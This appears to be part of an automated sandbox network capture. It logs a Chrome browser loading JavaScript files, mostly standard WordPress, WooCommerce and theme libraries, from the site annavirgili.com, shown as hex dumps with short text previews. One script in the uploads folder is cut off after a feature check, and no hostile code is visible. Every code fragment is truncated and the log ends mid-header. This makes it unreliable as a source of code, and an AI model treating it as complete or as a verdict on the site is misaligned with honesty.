                                                                                                          2024-12-12 11:58:30 UTC702OUTGET /wp-content/uploads/fgcheck.min.js?ver=1.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:30 UTC281INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:30 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 12 Sep 2023 10:03:27 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 375
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:30 UTC375INData Raw: 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 67 61 70 3a 31 70 78 3b 27 3e 3c 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 22 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 3b 6c 65 74 20 74 3d 31 3d 3d 3d 65 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 3b 72 65 74 75 72 6e 20 65 2e 72 65 6d 6f 76 65 28 29 2c 21 74 7d 28 29 7c 7c 77 69 6e 64 6f 77 2e 5f 74 65 73 74 46 42 29 7b 6c 65 74 20 65 3d 64 6f 63 75
                                                                                                          Data Ascii: if(function(){let e=document.createElement("div");e.innerHTML="<div style='display:flex;flex-direction:column;gap:1px;'><div></div><div></div></div>",document.body.appendChild(e);let t=1===e.scrollHeight;return e.remove(),!t}()||window._testFB){let e=docu


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          95192.168.2.2449887147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:30 UTC748OUTGET /wp-content/themes/ciena/assets/vendors/perfect-scrollbar/perfect-scrollbar.js?ver=1.5.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:30 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:30 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Sat, 26 Mar 2022 17:38:49 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 38464
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:30 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 20 76 31 2e 35 2e 30 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 30 20 48 79 75 6e 6a 65 20 4a 75 6e 2c 20 4d 44 42 6f 6f 74 73 74 72 61 70 20 61 6e 64 20 43 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 0a 20 2a 2f 0a 0a 28 66 75 6e 63 74 69 6f 6e 20 28 67 6c 6f 62 61 6c 2c 20 66 61 63 74 6f 72 79 29 20 7b 0a 20 20 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 20 3d 3d 3d 20 27 6f 62 6a 65 63 74 27 20 26 26 20 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 3f 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 20 3d 20 66 61 63 74 6f 72 79 28 29 20 3a 0a 20 20 74 79 70 65 6f 66 20 64 65 66 69
                                                                                                          Data Ascii: /*! * perfect-scrollbar v1.5.0 * Copyright 2020 Hyunje Jun, MDBootstrap and Contributors * Licensed under MIT */(function (global, factory) { typeof exports === 'object' && typeof module !== 'undefined' ? module.exports = factory() : typeof defi
                                                                                                          2024-12-12 11:58:30 UTC16384INData Raw: 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 69 2e 65 76 65 6e 74 2e 62 69 6e 64 28 69 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2c 20 27 74 6f 75 63 68 6d 6f 76 65 27 2c 20 6d 6f 75 73 65 4d 6f 76 65 48 61 6e 64 6c 65 72 29 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 69 5b 73 63 72 6f 6c 6c 62 61 72 59 52 61 69 6c 5d 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 63 6c 73 2e 73 74 61 74 65 2e 63 6c 69 63 6b 69 6e 67 29 3b 0a 0a 20 20 20 20 20 20 65 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 69 2e 65 76 65 6e 74 2e 62 69 6e 64 28 69 5b 73 63 72 6f 6c 6c 62 61 72 59 5d 2c 20 27 6d 6f 75 73 65 64 6f 77 6e 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 0a 20 20 20 20 20 20 62 69 6e 64
                                                                                                          Data Ascii: } else { i.event.bind(i.ownerDocument, 'touchmove', mouseMoveHandler); } i[scrollbarYRail].classList.add(cls.state.clicking); e.stopPropagation(); } i.event.bind(i[scrollbarY], 'mousedown', function (e) { bind
                                                                                                          2024-12-12 11:58:30 UTC5696INData Raw: 20 20 20 20 74 68 69 73 2e 6e 65 67 61 74 69 76 65 53 63 72 6f 6c 6c 41 64 6a 75 73 74 6d 65 6e 74 20 3d 20 74 68 69 73 2e 69 73 4e 65 67 61 74 69 76 65 53 63 72 6f 6c 6c 0a 20 20 20 20 20 20 3f 20 65 6c 65 6d 65 6e 74 2e 73 63 72 6f 6c 6c 57 69 64 74 68 20 2d 20 65 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 57 69 64 74 68 0a 20 20 20 20 20 20 3a 20 30 3b 0a 20 20 20 20 74 68 69 73 2e 65 76 65 6e 74 20 3d 20 6e 65 77 20 45 76 65 6e 74 4d 61 6e 61 67 65 72 28 29 3b 0a 20 20 20 20 74 68 69 73 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 20 3d 20 65 6c 65 6d 65 6e 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 20 7c 7c 20 64 6f 63 75 6d 65 6e 74 3b 0a 0a 20 20 20 20 74 68 69 73 2e 73 63 72 6f 6c 6c 62 61 72 58 52 61 69 6c 20 3d 20 64 69 76 28 63 6c 73 2e 65 6c 65 6d
                                                                                                          Data Ascii: this.negativeScrollAdjustment = this.isNegativeScroll ? element.scrollWidth - element.clientWidth : 0; this.event = new EventManager(); this.ownerDocument = element.ownerDocument || document; this.scrollbarXRail = div(cls.elem


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          96192.168.2.2449888147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:30 UTC562OUTGET /wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=6.6.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:30 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:30 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 24 Jun 2022 09:41:11 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 2139
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:30 UTC2139INData Raw: 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 73 29 7b 73 28 22 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6f 72 64 65 72 69 6e 67 22 29 2e 6f 6e 28 22 63 68 61 6e 67 65 22 2c 22 73 65 6c 65 63 74 2e 6f 72 64 65 72 62 79 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 73 28 74 68 69 73 29 2e 63 6c 6f 73 65 73 74 28 22 66 6f 72 6d 22 29 2e 74 72 69 67 67 65 72 28 22 73 75 62 6d 69 74 22 29 7d 29 2c 73 28 22 69 6e 70 75 74 2e 71 74 79 3a 6e 6f 74 28 2e 70 72 6f 64 75 63 74 2d 71 75 61 6e 74 69 74 79 20 69 6e 70 75 74 2e 71 74 79 29 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 70 61 72 73 65 46 6c 6f 61 74 28 73 28 74 68 69 73 29 2e 61 74 74 72 28 22 6d 69 6e 22 29 29 3b 30 3c 3d 6f 26 26 70 61 72 73 65 46 6c 6f 61 74 28 73 28 74 68 69 73
                                                                                                          Data Ascii: jQuery(function(s){s(".woocommerce-ordering").on("change","select.orderby",function(){s(this).closest("form").trigger("submit")}),s("input.qty:not(.product-quantity input.qty)").each(function(){var o=parseFloat(s(this).attr("min"));0<=o&&parseFloat(s(this


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          97192.168.2.2449884147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:30 UTC565OUTGET /wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=6.6.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:30 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:30 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 24 Jun 2022 09:41:11 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 2938
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:30 UTC2938INData Raw: 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 77 63 5f 63 61 72 74 5f 66 72 61 67 6d 65 6e 74 73 5f 70 61 72 61 6d 73 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 74 3d 21 30 2c 6f 3d 77 63 5f 63 61 72 74 5f 66 72 61 67 6d 65 6e 74 73 5f 70 61 72 61 6d 73 2e 63 61 72 74 5f 68 61 73 68 5f 6b 65 79 3b 74 72 79 7b 74 3d 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 69 6e 20 77 69 6e 64 6f 77 26 26 6e 75 6c 6c 21 3d 3d 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2c 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 22 77 63 22 2c 22 74 65 73 74 22 29 2c 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 72 65
                                                                                                          Data Ascii: jQuery(function(r){if("undefined"==typeof wc_cart_fragments_params)return!1;var t=!0,o=wc_cart_fragments_params.cart_hash_key;try{t="sessionStorage"in window&&null!==window.sessionStorage,window.sessionStorage.setItem("wc","test"),window.sessionStorage.re


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          98192.168.2.2449891147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:31 UTC566OUTGET /wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=2.5.4 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:32 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:31 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Mon, 06 Feb 2023 11:05:23 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 3053
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:32 UTC3053INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 28 24 29 20 7b 0a 20 20 20 20 24 2e 65 78 74 65 6e 64 28 7b 0a 20 20 20 20 20 20 20 20 41 64 76 61 6e 63 65 57 6f 6f 44 69 73 63 6f 75 6e 74 52 75 6c 65 73 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 6d 3a 20 6e 75 6c 6c 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 72 6f 64 75 63 74 5f 69 64 3a 20 6e 75 6c 6c 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 71 75 61 6e 74 69 74 79 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 70 74 69 6f 6e 73 3a 20 5b 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3a 20 6e 75 6c 6c 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 67 65 74 44 79 6e 61 6d 69 63 44 69 73 63 6f 75 6e 74 50 72 69 63 65 46 72 6f 6d 43 61 72 74 46 6f 72 6d 3a 20 66 75 6e 63 74 69 6f 6e 28 24
                                                                                                          Data Ascii: (function ($) { $.extend({ AdvanceWooDiscountRules: { form: null, product_id: null, quantity: 0, options: [], target: null, getDynamicDiscountPriceFromCartForm: function($


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          99192.168.2.2449890147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:31 UTC557OUTGET /wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.5.4 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:32 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:31 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Mon, 06 Feb 2023 11:05:23 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 10721
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:32 UTC10721INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 28 24 29 20 7b 0a 20 20 20 20 2f 2a 2a 0a 20 20 20 20 20 2a 20 72 65 66 72 65 73 68 20 63 61 72 74 20 77 68 65 6e 20 70 61 79 6d 65 6e 74 20 6d 65 74 68 6f 64 20 63 68 61 6e 67 65 64 0a 20 20 20 20 20 2a 2f 0a 20 20 20 20 69 66 20 28 61 77 64 72 5f 70 61 72 61 6d 73 2e 72 65 66 72 65 73 68 5f 6f 72 64 65 72 5f 72 65 76 69 65 77 20 3d 3d 20 27 31 27 29 20 7b 0a 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 27 63 68 61 6e 67 65 27 2c 20 27 69 6e 70 75 74 5b 6e 61 6d 65 3d 22 70 61 79 6d 65 6e 74 5f 6d 65 74 68 6f 64 22 5d 2c 69 6e 70 75 74 5b 6e 61 6d 65 3d 22 62 69 6c 6c 69 6e 67 5f 63 69 74 79 22 5d 2c 69 6e 70 75 74 5b 6e 61 6d 65 3d 22 62 69 6c 6c 69 6e 67 5f 70 6f 73 74 63 6f 64 65 22 5d 27 2c 20 66
                                                                                                          Data Ascii: (function ($) { /** * refresh cart when payment method changed */ if (awdr_params.refresh_order_review == '1') { $(document).on('change', 'input[name="payment_method"],input[name="billing_city"],input[name="billing_postcode"]', f


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          100192.168.2.2449894147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:31 UTC717OUTGET /wp-content/themes/ciena/assets/js/headroom.js?ver=0.11.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:32 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:32 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Sat, 26 Mar 2022 17:38:07 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 10995
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:32 UTC10995INData Raw: 2f 2a 21 0a 20 2a 20 68 65 61 64 72 6f 6f 6d 2e 6a 73 20 76 30 2e 31 31 2e 30 20 2d 20 47 69 76 65 20 79 6f 75 72 20 70 61 67 65 20 73 6f 6d 65 20 68 65 61 64 72 6f 6f 6d 2e 20 48 69 64 65 20 79 6f 75 72 20 68 65 61 64 65 72 20 75 6e 74 69 6c 20 79 6f 75 20 6e 65 65 64 20 69 74 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 32 30 20 4e 69 63 6b 20 57 69 6c 6c 69 61 6d 73 20 2d 20 68 74 74 70 3a 2f 2f 77 69 63 6b 79 2e 6e 69 6c 6c 69 61 2e 6d 73 2f 68 65 61 64 72 6f 6f 6d 2e 6a 73 0a 20 2a 20 4c 69 63 65 6e 73 65 3a 20 4d 49 54 0a 20 2a 2f 0a 0a 28 66 75 6e 63 74 69 6f 6e 20 28 67 6c 6f 62 61 6c 2c 20 66 61 63 74 6f 72 79 29 20 7b 0a 20 20 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 20 3d 3d 3d 20 27 6f 62 6a 65 63 74 27 20 26 26 20 74 79 70 65
                                                                                                          Data Ascii: /*! * headroom.js v0.11.0 - Give your page some headroom. Hide your header until you need it * Copyright (c) 2020 Nick Williams - http://wicky.nillia.ms/headroom.js * License: MIT */(function (global, factory) { typeof exports === 'object' && type


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          101192.168.2.2449893147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:31 UTC755OUTGET /wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.js?ver=1.4.1-wc.6.6.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:32 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:32 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 24 Jun 2022 09:41:11 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 1392
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:32 UTC1392INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 43 6f 6f 6b 69 65 20 50 6c 75 67 69 6e 20 76 31 2e 34 2e 31 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 63 61 72 68 61 72 74 6c 2f 6a 71 75 65 72 79 2d 63 6f 6f 6b 69 65 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 33 20 4b 6c 61 75 73 20 48 61 72 74 6c 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 28 72 65 71 75 69
                                                                                                          Data Ascii: /*! * jQuery Cookie Plugin v1.4.1 * https://github.com/carhartl/jquery-cookie * * Copyright 2013 Klaus Hartl * Released under the MIT license */!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof exports?e(requi


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          102192.168.2.2449892147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:31 UTC731OUTGET /wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:32 UTC284INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:32 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 25 Mar 2022 21:30:22 GMT
